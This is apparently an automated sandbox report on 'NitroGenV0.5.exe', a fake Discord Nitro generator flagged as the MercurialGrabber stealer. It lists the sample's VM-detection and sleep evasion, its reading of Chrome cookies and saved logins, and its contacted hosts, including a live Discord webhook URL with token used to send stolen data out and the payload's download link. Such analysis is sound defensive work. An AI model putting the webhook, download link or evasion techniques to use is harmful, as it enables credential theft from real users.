Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6928 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6932 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Window / User API: threadDelayed 2881 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Window / User API: threadDelayed 404 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Window / User API: threadDelayed 718 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Window / User API: threadDelayed 2482 Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99890 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99781 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99671 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99562 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99453 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99343 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99234 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99125 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99015 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 98906 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 98796 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 98684 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99892 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99642 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99500 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99391 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99281 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99172 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99063 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 98922 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 98813 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 98642 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99906 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99797 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: NitroGenV0.5.exe.6.dr Binary or memory string: SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
Source: NitroGenV0.5.exe, 00000011.00000002.351226359.000000001C976000.00000004.00000001.sdmp Binary or memory string: VMware
Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp Binary or memory string: ISYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp Binary or memory string: KSYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
Source: NitroGenV0.5.exe.6.dr Binary or memory string: vmware
Source: NitroGenV0.5.exe, 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr Binary or memory string: virtualboxvboxqemu
Source: wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: NitroGenV0.5.exe Binary or memory string: SOFTWARE\VMWare, Inc.\VMWare Tools
Source: wget.exe, NitroGenV0.5.exe, 00000006.00000003.301890578.0000000000F23000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: NitroGenV0.5.exe, 00000006.00000002.304952361.000000001BC13000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware2V678OLTWin32_VideoControllerGBBSEH4DVideoController120060621000000.000000-00093469586display.infMSBDAPMDL4PPYPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE6F_LCFCaPrYY
Source: NitroGenV0.5.exe Binary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
Source: NitroGenV0.5.exe, 00000011.00000002.351226359.000000001C976000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware2V678OLTWin32_VideoControllerGBBSEH4DVideoController120060621000000.000000-00093469586display.infMSBDAPMDL4PPYPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE6F_LCFC
Source: NitroGenV0.5.exe, 00000011.00000002.350055756.0000000000A5C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp Binary or memory string: "SOFTWARE\VMWare, Inc.\VMWare Tools
Source: NitroGenV0.5.exe, 00000006.00000002.303503092.000000001BB70000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: NitroGenV0.5.exe.6.dr Binary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdevkSYSTEM\CurrentControlSet\Control\VirtualDeviceDriversESOFTWARE\VMWare, Inc.\VMWare ToolsUSOFTWARE\Oracle\VirtualBox Guest Additions1HARDWARE\ACPI\DSDT\VBOX_SSYSTEM\ControlSet001\Services\Disk\Enum\0cHARDWARE\Description\System\SystemBiosInformationYHARDWARE\Description\System\VideoBiosVersion]HARDWARE\Description\System\SystemManufacturer[HARDWARE\Description\System\SystemProductName[HARDWARE\Description\System\Logical Unit Id 0

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Memory allocated: page read and write | page guard Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\wget.exe Queries volume information: C:\Users\user\Desktop\download VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Queries volume information: C:\Users\user\Desktop\download\NitroGenV0.5.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Queries volume information: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the product ID of Windows
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected MercurialGrabber
Source: Yara match File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Login Data Jump to behavior

Remote Access Functionality:

barindex
Yara detected MercurialGrabber
Source: Yara match File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 517177 URL: https://cdn.discordapp.com/... Startdate: 07/11/2021 Architecture: WINDOWS Score: 100 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Yara detected MercurialGrabber 2->45 47 C2 URLs / IPs found in malware configuration 2->47 6 NitroGenV0.5.exe 15 11 2->6         started        11 NitroGenV0.5.exe 9 2->11         started        13 cmd.exe 2 2->13         started        process3 dnsIp4 33 discord.com 162.159.136.232, 443, 49744, 49745 CLOUDFLARENETUS United States 6->33 35 ip-api.com 208.95.112.1, 49743, 49756, 80 TUT-ASUS United States 6->35 37 ip4.seeip.org 23.128.64.141, 443, 49742, 49755 JOESDATACENTERUS United States 6->37 27 C:\Users\user\AppData\...27itroGenV0.5.exe, PE32 6->27 dropped 29 C:\Users\...29itroGenV0.5.exe:Zone.Identifier, ASCII 6->29 dropped 49 Antivirus detection for dropped file 6->49 51 Detected unpacking (overwrites its own PE header) 6->51 53 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 6->53 15 conhost.exe 6->15         started        39 162.159.135.232, 443, 49757, 49758 CLOUDFLARENETUS United States 11->39 55 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 11->55 57 Tries to harvest and steal browser information (history, passwords, etc) 11->57 59 Queries memory information (via WMI often done to detect virtual machines) 11->59 17 conhost.exe 11->17         started        19 wget.exe 2 13->19         started        23 conhost.exe 13->23         started        file5 signatures6 process7 dnsIp8 31 cdn.discordapp.com 162.159.129.233, 443, 49741 CLOUDFLARENETUS United States 19->31 25 C:\Users\user\Desktop\...25itroGenV0.5.exe, PE32 19->25 dropped file9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS false
162.159.136.232
 discord.com United States
13335 CLOUDFLARENETUS true
162.159.129.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false
23.128.64.141
 ip4.seeip.org United States
19969 JOESDATACENTERUS false
162.159.135.232
 unknown United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
discord.com 162.159.136.232 true
cdn.discordapp.com 162.159.129.233 true
ip-api.com 208.95.112.1 true
ip4.seeip.org 23.128.64.141 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ip4.seeip.org/ false
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://ip-api.com//json/84.17.52.68 false
    		high
    https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY true
    • Avira URL Cloud: safe
    		 unknown
    https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe false
      		high